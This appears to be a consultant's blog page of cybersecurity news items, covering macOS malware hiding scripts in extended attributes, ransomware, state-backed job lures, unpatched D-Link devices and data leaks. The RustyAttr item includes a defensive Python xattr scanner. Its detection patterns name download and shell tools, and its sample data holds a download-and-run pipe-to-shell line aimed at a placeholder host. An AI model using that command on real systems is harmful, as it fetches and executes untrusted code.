Steve Thomas - IT Consultant


  • Security researchers from Group-IB discover unique new piece of malware
  • It abuses extended attributes for macOS files to deploy the payload
  • The malware is most likely built by North Korean state-sponsored actors

Cybersecurity researchers have stumbled upon yet another malware variant for macOS likely built by the notorious North Korean Lazarus group.

The report from Group-IB concerns the discovery of RustyAttr, a brand new piece of macOS malware built using the Tauri framework.

The malware was not flagged on VirusTotal and was, at one point, signed using a legitimate Apple developer ID. The ID has since been revoked.

Extended attributes

Days earlier, researchers from Jamf found something similar: a seemingly benign app on VirusTotal, built with Flutter, that served as a backdoor for macOS victims.

In both cases, the malware used novel obfuscation methods, but wasn’t fully operational, leading the researchers to believe that they were mere experiments, as crooks look for new ways to hide the infection.

RustyAttr was found abusing extended attributes for macOS, the researchers claim.

Extended attributes (xattrs) are a feature that allows files and directories to store additional metadata beyond standard attributes like name, size, and permissions. They are used for different things, from storing security-related information, to tagging files with specific metadata, and enabling compatibility with other file systems. In this case, the attribute was named “test” and carried a shell script.

When the malware runs, it loads a web page containing a piece of JavaScript. This script, called preload.js, pulls the content of the “test” attribute, which appears to be a location. That location is then passed to the ‘run_command’ function, where the shell script executes it.
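The pattern described above, a shell script hidden in an extended attribute that the app later reads and runs, can be hunted for from the defender's side by listing each file's xattrs and flagging values that look like executable text rather than metadata. The following is an added example, not code from Group-IB or from the malware; the benign-attribute allow-list, the script markers and the sample attribute values are constructed assumptions.

```python
"""Flag files whose extended attributes (xattrs) carry script-like payloads."""
import os
import re
from typing import Dict, List, Tuple

# Attribute names macOS sets routinely; anything else deserves a closer look.
# Constructed allow-list (an assumption); extend it for your own fleet.
KNOWN_BENIGN = {
    "com.apple.quarantine",
    "com.apple.FinderInfo",
    "com.apple.metadata:kMDItemWhereFroms",
    "com.apple.lastuseddate#PS",
}

# Cheap indicators that an attribute value is a script, not ordinary metadata.
SCRIPT_MARKERS = (
    re.compile(rb"^#!\s*/"),                 # shebang at the start of the value
    re.compile(rb"\b(curl|wget)\b"),         # download helpers
    re.compile(rb"\b(bash|zsh|sh)\s+-c\b"),  # inline shell invocation
    re.compile(rb"\b(osascript|nohup)\b"),   # common macOS launch helpers
    re.compile(rb"\$\(|\|\s*(sh|bash)\b"),   # command substitution / pipe-to-shell
)


def score_value(value: bytes) -> List[str]:
    """Return the patterns (as text) that an xattr value matches."""
    return [p.pattern.decode() for p in SCRIPT_MARKERS if p.search(value)]


def classify_xattrs(attrs: Dict[str, bytes]) -> List[Tuple[str, str, List[str]]]:
    """Classify one file's xattrs as (name, verdict, markers).

    verdict is "benign" for a known Apple attribute, "suspicious" when script
    markers are present, and "unknown" for an unrecognised name with no markers.
    """
    findings = []
    for name, value in attrs.items():
        if name in KNOWN_BENIGN:
            findings.append((name, "benign", []))
            continue
        markers = score_value(value)
        findings.append((name, "suspicious" if markers else "unknown", markers))
    return findings


def read_xattrs(path: str) -> Dict[str, bytes]:
    """Read a file's xattrs via os.listxattr/os.getxattr.

    These calls exist on Linux; macOS builds of Python lack them, so there you
    would shell out to `xattr -l` or use a ctypes binding instead.
    """
    if not hasattr(os, "listxattr"):
        raise OSError("os.listxattr is not available on this platform")
    names = os.listxattr(path, follow_symlinks=False)
    return {n: os.getxattr(path, n, follow_symlinks=False) for n in names}


def scan_tree(root: str) -> List[Tuple[str, str, List[str]]]:
    """Walk a directory (for example an .app bundle) and return suspicious xattrs."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            p = os.path.join(dirpath, f)
            try:
                attrs = read_xattrs(p)
            except OSError:
                continue  # unreadable file or unsupported filesystem
            hits += [(p, n, m) for n, v, m in classify_xattrs(attrs) if v == "suspicious"]
    return hits


# Constructed sample mirroring the reported layout: an ordinary quarantine
# attribute next to an attribute named "test" that holds a shell script.
SAMPLE_ATTRS = {
    "com.apple.quarantine": b"0083;66f1c2a0;Safari;",
    "test": b"#!/bin/sh\nopen /tmp/decoy.pdf\ncurl -s http://placeholder.invalid/p | sh\n",
}

if __name__ == "__main__":
    for name, verdict, markers in classify_xattrs(SAMPLE_ATTRS):
        print(f"{name:38s} {verdict:10s} {markers}")
```

Run `scan_tree("/Applications/Some.app")` on a Linux host with the bundle mounted, or feed `classify_xattrs` the output of `xattr -l` on macOS, and triage every "suspicious" hit by hand; "unknown" names are worth a look too, since nothing requires a payload to match these markers.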

While the process is ongoing, the victim is tricked with a decoy PDF file or a fake error message that pops up in the foreground.

RustyAttr was most likely built by Lazarus, the researchers said, although since there are no reported victims, they cannot be absolutely certain. However, they are confident that the malware was built to test new delivery and obfuscation methods on macOS devices.

Via BleepingComputer

  • American Associated Pharmacies allegedly fell prey to a ransomware attack
  • The attackers are saying the company paid for the decryptor
  • The group is asking for more money, to keep the stolen files private

American Associated Pharmacies (AAP) is joining the ever-growing list of American healthcare organizations to have suffered a ransomware attack.

Following the likes of Change Healthcare, Henry Schein, CommonSpirit, and many others, AAP appears to have suffered the classic double whammy: having its sensitive data stolen, and its systems encrypted.

A report from The Register claims the company is yet to make an official statement regarding the attack, having only force-reset passwords for all of its users and notified them of the change.

Say hi to Embargo

"All user passwords associated with both APIRx.com and RxAAP.com have been reset, so existing credentials will no longer be valid to access the sites," the company said in a short announcement. "Please click 'forgot password' on the log in screen and follow the prompts accordingly to reset your password."

At the same time, the group that assumed responsibility for the attack is called Embargo. You can be excused for not hearing about them, as they’re a relatively new group. ESET seems to be the first to spot the new actor, when it used endpoint detection and response (EDR) killing tools to drop its payload, last June. It also observed the group using a Rust-based ransomware kit.

New or not, Embargo claims to have stolen almost 1.5TB of sensitive data. It also claims that AAP paid $1.3 million to have its systems restored, and that it needs to pay an additional $1.3 million to keep the stolen files off the dark web.

We don’t know what kinds of documents Embargo stole from the company, but if the Change Healthcare attack was any indication, they could be highly classified information whose leak could lead to class-action lawsuits and regulatory pressure.

We have reached out to AAP with additional questions and will report if we hear anything back.

  • Iranian state-sponsored actors are targeting aerospace pros with fake jobs
  • The goal is to install backdoors and exfiltrate important data
  • The style mimics that of Lazarus, a known North Korean actor

Iranian state-sponsored hackers have been observed targeting victims in the aerospace industry with fake job offers, which resulted in the deployment of the SnailResin malware, as part of their cyber-espionage campaign.

Cybersecurity researchers at ClearSky revealed how the threat actor, known as TA455, created fake recruitment sites, and fake profiles on social media sites such as LinkedIn. After that, they would approach their targets, and get them to download files as part of the onboarding process.

Among the files was SnailResin, a piece of malware that acts as a loader for the SlugResin backdoor, capable of data exfiltration, command-and-control (C2) communication, and persistence on victim systems.

Iranians? Or North Koreans? Or both?

The campaign, dubbed “Dream Job” started in September 2023, if not earlier, ClearSky noted.

TA455 is a well-known cyberespionage group, linked with Iran's Islamic Revolutionary Guard Corps (IRGC), and shares similarities with other groups like APT35 and TA453. Besides the aerospace industry, TA455 was seen targeting defense, and government entities, in the Middle East, Europe, and the US. Its goal, for the most part, is cyber-espionage, gathering sensitive information for geopolitical intelligence purposes.

What makes this campaign particularly interesting is the fact that it mimics the style of Lazarus, a North Korean state-sponsored group. Fake job attacks are basically synonymous with Lazarus at this point, as they were used in some of the most destructive campaigns against firms in the crypto industry. At this point, ClearSky doesn’t know if TA455 is mimicking Lazarus, tries to hide behind the group, or is in cooperation with them.

“The similar “Dream Job” lure, attack techniques, and malware files suggest that either Charming Kitten was impersonating Lazarus to hide its activities, or that North Korea shared attack methods and tools with Iran,” they said.

In any case, be careful when getting new job offers, especially if they sound too good to be true.

  • Earlier this week, researchers discovered a 9.2-severity flaw affecting multiple NAS models
  • D-Link says it won't patch them since they reached end-of-life status
  • Crooks are now targeting them with available exploit code

Cybercriminals have begun targeting D-Link NAS devices, recently found to have a critical vulnerability, but which will not be patched due to being at their end of life.

Threat monitoring service Shadowserver recently sounded the alarm in a brief thread posted on X.

It was recently reported multiple versions of D-Link NAS devices were vulnerable to a 9.2-severity flaw that could allow hackers to interfere with the endpoints. However, as the devices had reached their end-of-life, the company said it would not be addressing the flaw, and would not be issuing a patch - instead, advising users to replace the devices with newer models.

Thousand(s) of victims

While the researchers said the exploitation was somewhat difficult since the complexity of an attack was relatively high, they did stress that there is a publicly available exploit out there.

“We have observed D-Link NAS CVE-2024-10914 /cgi-bin/account_mgr.cgi command injection exploitation attempts starting Nov 12th,” the researchers said. “This vuln affects EOL/EOS devices, which should be removed from the Internet.”

They added that in total, there were more than 60,000 endpoints out there that could be compromised, including models such as DNS-320 Version 1.00, DNS-320LW Version 1.01.0914.2012, DNS-325 Version 1.01 and Version 1.02, and DNS-340L Version 1.08.

Shadowserver also said that it observed roughly 1,100 potential victims, significantly fewer than the 60,000 that were originally claimed.

A NAS device is a dedicated data storage unit connected to a network, allowing multiple users and devices to access and store data centrally. It provides secure file sharing, data backup, and storage, making it ideal for both home and business use. NAS devices are typically easy to set up and scale, offering RAID support and other protections against data loss.

Cybercriminals frequently target NAS devices because they often hold sensitive data, including personal documents, financial information, and business files. By compromising NAS systems, attackers can steal, encrypt, or delete valuable data, with ransomware being a common threat.

Via BleepingComputer

  • The National Labor Relations Board has ruled against Amazon
  • Amazon can no longer hold mandatory anti-union meetings
  • The meetings were found to violate workers' rights

The National Labor Relations Board (NLRB) has ruled Amazon can no longer impose mandatory ‘captive audience’ meetings on staff, as it was found to be using these events to ‘coerce’ employees with anti-unionization objectives.

The decision passed 3-1, with the NLRB General Counsel, Jennifer Abruzzo, arguing the meetings violated workers’ rights, as they were forced to attend and be subjected to the company’s anti-union messaging.

Abruzzo affirmed companies should be free to make their case against unions, but workers shouldn’t be forced to listen.

Wins for workers

This is the latest development in a string of conflicts between Amazon and its workers, with the retailer aggressively opposing organizing efforts and unionization in its warehouses.

Tech workers have some of the lowest union membership rates of any industry, and efforts by Amazon to dissuade workers from organizing have proved effective. However, the law states that workers must be able to freely choose whether to debate union representation, and when and how they do it.

“Ensuring that workers can make a truly free choice about whether they want union representation is one of the fundamental goals of the National Labor Relations Act. Captive audience meetings—which give employers near-unfettered freedom to force their message about unionization on workers under threat of discipline or discharge—undermine this important goal,” said Chairman Lauren McFerran.

“Today’s decision better protects workers’ freedom to make their own choices in exercising their rights under the Act, while ensuring that employers can convey their views about unionization in a noncoercive manner."

Despite the considerable opposition from the retail giant, workers in Staten Island won a historic victory by voting to create the Amazon Labor Union, a huge step in their struggle for better working conditions and protections.

Via Engadget

  • Hacker found selling a database of 180+million emails on the dark web
  • The archive was stolen from a data broker
  • The data broker confirmed the information was scraped from public sources

A hacker is selling a database containing 183 million records of people’s contact details, including email addresses, stolen from a data broker who, in turn, generated it by scraping publicly available data.

One might say, no harm - no foul, but still, whoever buys this database will get the chance to annoy millions of people with spam, and possibly even target them with phishing, malware, and business email compromise (BEC).

The database, which includes people’s business email addresses, postal addresses, phone numbers, employer names, job titles, and links to various social media, is being sold by a threat actor alias ‘KryptonZambie’, for $6,000.

Decommissioned legacy systems

The archive was stolen from a data broker company called DemandScience (previously known as Pure Incubation) who has confirmed the data was publicly available to start with.

"It is also important to note that we process publicly available business contact information, and do not collect, store, or process consumer data or any type of credential information or sensitive personal information including accounts, passwords, home addresses or other personal, non-business information," a DemandScience spokesperson said in an email.

HaveIBeenPwned?, a website that tracks email addresses compromised in various data breaches, reports that the archive was pulled from a “decommissioned legacy system: “In early 2024, a large corpus of data from DemandScience (a company owned by Pure Incubation), appeared for sale on a popular hacking forum. Later attributed to a leak from a decommissioned legacy system, the breach contained extensive data that was largely business contact information aggregated from public sources.”

We don’t know if the hacker managed to sell the database already, or if there were multiple buyers. At press time, there was no information of in-the-wild abuse.

Via The Register

  • Five Eyes alliance has revealed the most exploited vulnerabilities of 2023
  • Zero-day exploits were the primary concern, with CVE-2023-3519 at the top of the list
  • Businesses urged to patch as soon as possible to stay safe

The Five Eyes intelligence alliance has revealed the most routinely exploited vulnerabilities for 2023. The joint advisory, made with contributions from agencies in the US, UK, Australia, New Zealand, and Canada, has called for organizations to patch the security flaws to mitigate network exposure.

The agencies confirmed what many in the industry will know all too well, that threat actors focus their attacks on zero-day attacks, with 12 out of the top 15 exploited vulnerabilities initially exploited as a zero-day.

“In 2023, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks compared to 2022, allowing them to conduct cyber operations against higher-priority targets,” the advisory warned.

Injections and escalations

The top vulnerability for 2023 was CVE-2023-3519, a code injection flaw in Citrix NetScaler ADC/Gateway, which was used in critical infrastructure attacks in the US last year and had a severity rating of 9.8, making it a critical flaw.

Another high severity flaw in the top three, CVE-2023-20198, was one that Cisco issued a patch for in October 2023, which allowed attackers to create accounts on affected devices with privileged access, gaining full control over the device.

The agencies, as always, strongly encouraged end-user organizations to continually update software and applications, implement a robust patch management process, and perform regular secure systems backups to ensure your company stays safe against cyberattacks.

“Malicious cyber actors continue to have the most success exploiting vulnerabilities within two years after public disclosure of the vulnerability,” the advisory warned. “The utility of these vulnerabilities declines over time as more systems are patched or replaced. Malicious cyber actors find less utility from zero-day exploits when international cybersecurity efforts reduce the lifespan of zero-day vulnerabilities.”

  • Researchers discover GoIssue, a new tool for extracting GitHub user emails
  • It is being sold for $700 on the dark web
  • Such a high-precision tool could lead to dangerous supply chain attacks

GitHub users are allegedly being targeted in a brand new phishing campaign, according to SlashNext.

The company recently published an article titled “GoIssue – The Tool Behind Recent GitHub Phishing Attacks”, detailing the tool, which, from the headline, appears to have already been put to use.

However, the article’s body mostly discusses the potential risks and the ways it could be used to facilitate targeted phishing campaigns and other cyber attacks. It outlines the features of GoIssue and how attackers "could" use it to target GitHub users, suggesting hypothetical scenarios rather than confirming any specific incidents where the tool has been deployed.

Discount for early adopters

In any case, GoIssue is definitely a sophisticated hacking tool, and GitHub users should be on their guard.

SlashNext claims GoIssue can extract email addresses from public GitHub profiles and send bulk emails directly to people’s inboxes. That way, crooks could craft highly targeted, convincing phishing emails, which could result in GitHub users losing access to their profiles, or having projects compromised with malware in supply-chain attacks.

"Whether you're aiming to reach a specific audience or expand your outreach, GoIssue offers the precision and power you need," GoIssue’s developer, a threat actor called ‘cyberdluffy’, said in an ad posted on the dark web.

To purchase a custom build of the tool, you will need to pay $700. Access to the source code can also be acquired, but for $3,000. TheHackerNews found that on October 11 the developer slashed the prices to $150 and $1,000 respectively, for the first five customers. So, we might assume that no groups have used it just yet.

GitHub is a web-based platform that provides version control and collaboration features for software development projects. It is extremely popular, and as such, often targeted by various criminal groups.

Via SlashNext

  • Ahold Delhaize confirms being hit by cyberattack
  • Multiple retail stores across the US were affected by the attack
  • Other details are not known at this time

Multinational retailer Ahold Delhaize has confirmed recently suffering a cyberattack which forced it to shut down parts of its IT infrastructure. As a result, some of its grocery stores and pharmacies, mainly those in the United States, could not service their customers properly.

In a press release, the company said it recently detected a cybersecurity issue within its US network, brought in third-party experts to assist, notified the police, and took its network offline.

The company operates a variety of supermarket, convenience store, and online grocery brands across Europe and the United States, including brands like Food Lion, Stop & Shop, and Giant.

Delivery delays and other problems

“This issue and subsequent mitigating actions have affected certain Ahold Delhaize USA brands and services including a number of pharmacies and certain e-commerce operations,” the company said in its announcement.

“Each of Ahold Delhaize USA’s brands' stores are open and serving customers. We will continue to take actions to further protect our systems. The security of our customers, associates and partners is a top priority.”

A report from The Register claims woes for US retailers have been going on for a week now, resulting in even the staff voicing their annoyance on social media.

Not all retailers were affected the same way, however. At one point, the pharmacy at Stop & Shop could not refill prescriptions, a problem exacerbated by phone lines being down as well. Food Lion, on the other hand, had to deal with missing and delayed deliveries, and Instacart order return dates were constantly being pushed back.

At the moment, further details are scarce, and The Register claims that employees were told not to discuss the incident with the media.

Usually, when a company shuts down its systems, it’s to prevent them from being encrypted, and to prevent hackers from exfiltrating information - which usually happens in a ransomware attack.

  • Experts found six malicious apps built for macOS
  • The Apple IDs used to sign the apps have been revoked
  • The malware was likely just an experiment

North Korean state-sponsored threat actors have been seen targeting macOS users with fake games and crypto tracking apps built with Flutter.

Cybersecurity researchers at Jamf recently found several apps on VirusTotal which seemed completely benign, yet connected to servers in North Korea, which was deemed “stage one” malware functionality.

There are two particularly interesting details about this malware. First - it was created with Flutter, an open source user interface (UI) software development kit created by Google. It allows developers to build natively compiled applications for mobile (iOS and Android), web, and desktop (Windows, macOS, Linux) from a single codebase.

Six malicious apps

One of the apps was called 'New Updates in Crypto Exchange (2024-08-28).app', and others were labeled in a similar manner. Yet, when opened, they ran open-source minesweeper games and similar.

Flutter, which uses the Dart programming language, provides obfuscation to the malicious code by design, the researchers said. Therefore, the malware was not that easy to spot (hence appearing as benign in VirusTotal).

The second interesting detail is that the apps were signed and notarized by a legitimate Apple developer ID, which means that at some point, they passed Apple’s security checks.

Jamf found a total of six apps, five of which were signed by a working Apple developer ID. It has been revoked in the meantime.

Yet, the researchers believe that the apps were never meant to be a part of an actual hacking campaign, and that they only served as an experiment.

“The malware discovered in this blog shows strong signs that it is likely testing for greater weaponization,” they added. “This could perhaps be an attempt to see if a properly signed app with malicious code obscured within a dylib could get approved by Apple’s notarization server, as well as slide under the radar of antivirus vendors.”

Via BleepingComputer

  • Security researchers find critical flaws in modems reaching End of Life
  • D-Link says it won't patch them, and recommends upgrading the hardware
  • There are some 60,000 vulnerable devices out there

Older D-Link routers are potentially vulnerable to more than one critical security issue which could allow threat actors to take over the devices. However, since they have reached end-of-life status (EoL), the company says it will not be releasing any patches, and advises users to replace the endpoints with newer models.

The news comes shortly after we reported multiple D-Link NAS endpoints were found vulnerable to CVE-2024-10914, a command injection flaw with a 9.2 severity score - however the company again said it wouldn’t be issuing a fix, since the affected devices have all reached EoL.

Now, security researcher Chaio-Lin Yu (Steven Meow) found three bugs plaguing the D-Link DSL6740C modem. One is tracked as CVE-2024-11068, has a severity score of 9.8, and allows threat actors to change passwords through privileged API access. The other two are CVE-2024-11067, and CVE-2024-11066, and are a path traversal flaw and a remote code execution (RCE) flaw, with 7.5 and 7.2 scores, respectively.

Tens of thousands of vulnerable endpoints

Roughly 60,000 vulnerable devices are currently connected to the internet, the majority being located in Taiwan. The model isn’t even available in the US, BleepingComputer states, since it reached EoL almost a year ago. With that in mind, D-Link said it wouldn’t be addressing the flaw, and suggests "retiring and replacing D-Link devices that have reached EOL/EOS."

The same model is also vulnerable to four additional high-severity command injection flaws, the publication states, citing information from the Taiwan Computer Emergency Response Team / Coordination Center (TWCERT/CC). These flaws are tracked as CVE-2024-11062, CVE-2024-11063, CVE-2024-11064, and CVE-2024-11065.

Users who are unable to replace their routers at the moment are advised to at least restrict remote access, and set secure access passwords, to minimize the chance of compromise. This would be a wise move since routers are one of the most targeted endpoints out there.

  • Connor Moucka and John Binns accused of attacking 10 companies, including AT&T
  • The US Government claims they extorted 36 bitcoin from their victims
  • Both were known to law enforcement in the past

The US government has accused two individuals of breaching 10 major companies, stealing their sensitive data, and then either extorting the firms for money, or selling the stolen data on the dark web. Among the victims is, most likely, AT&T, the American telecommunications powerhouse.

In the indictment, which TechCrunch published, the two individuals are named as Connor Moucka and John Binns. Both are already known, to both the media and law enforcement, as Alexander ‘Connor’ Moucka (aka Waifu and Judische) was taken into custody on October 30, in Canada, following a request by US law enforcement.

Binns, on the other hand, was already mentioned in relation to the AT&T hack, as one of the hackers with access to the stolen database, who tried to sell it back to the company. He was arrested in Turkey, for alleged crimes he committed in 2021 and, apparently, was to blame for the data breach that happened at T-Mobile, as well.

Hints of AT&T

The US government claims Moucka and Binns “devised and executed international computer hacking and wire fraud schemes to hack into at least 10 victim organizations’ protected computer networks, steal sensitive information, threaten to leak the stolen data unless the victims paid ransoms, and offer to sell online, and sell, the stolen data.”

“Through this scheme, the co-conspirators gained unlawful access to billions of sensitive customer records, including individuals’ non-content call and text history records, banking and other financial information, payroll records, Drug Enforcement Agency (DEA) registration numbers, driver’s license numbers, passport numbers, Social Security Numbers, and other personally identifiable information,” it says in the indictment.

The result of the attacks, the Government concludes, is a profit of “at least 36 bitcoin ($2.5m at time of payment)” extorted from at least three victims.

While the document does not mention the names of victim companies, it does list Victim-2 as a major telecommunications company located in the United States, whose Cloud Computing Instance was hosted at computer servers located in Virginia. It was also said that this victim was breached in mid-April. All these things align it with AT&T.

Both the company, and the Department of Justice (DoJ), are currently silent on the matter.

Via TechCrunch
